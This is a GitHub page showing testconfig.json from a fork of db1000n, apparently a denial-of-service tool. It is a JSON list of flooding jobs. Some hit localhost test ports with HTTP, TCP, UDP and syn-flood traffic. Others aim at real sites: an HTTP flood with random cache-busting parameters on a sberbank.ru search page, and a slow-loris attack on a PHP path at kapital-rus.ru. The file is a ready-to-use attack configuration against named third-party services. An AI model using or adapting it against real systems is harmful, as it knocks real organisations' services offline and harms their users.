forked from arriven/db1000n
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtestconfig.json
55 lines (55 loc) · 1.12 KB
/
testconfig.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
{
"jobs": [
{
"type": "http",
"args": {
"method": "GET",
"path": "http://localhost:8080/test?queryparam=test&s={{ random_uuid }}",
"headers": {
"Authorization": "wtf"
}
}
},
{
"type": "tcp",
"args": {
"address": "localhost:9090",
"header": "test",
"body": "more_test"
}
},
{
"type": "udp",
"count": 100,
"args": {
"address": "localhost:9191",
"header": "test",
"body": "more_test",
"interval_ms": 1000
}
},
{
"type": "http",
"args": {
"method": "GET",
"path": "https://www.sberbank.ru/ru/search?searchid={{ random_uuid }}&l10n=ru&reqenc=&text={{ random_uuid }}",
"headers": {}
}
},
{
"type": "syn-flood",
"args": {
"host": "localhost",
"port": 80,
"payload_len": 1000,
"flood_type": "random"
}
},
{
"type": "slow-loris",
"args": {
"path": "https://kapital-rus.ru/inc2/common/js/doo/modules/searchSite/u.php"
}
}
]
}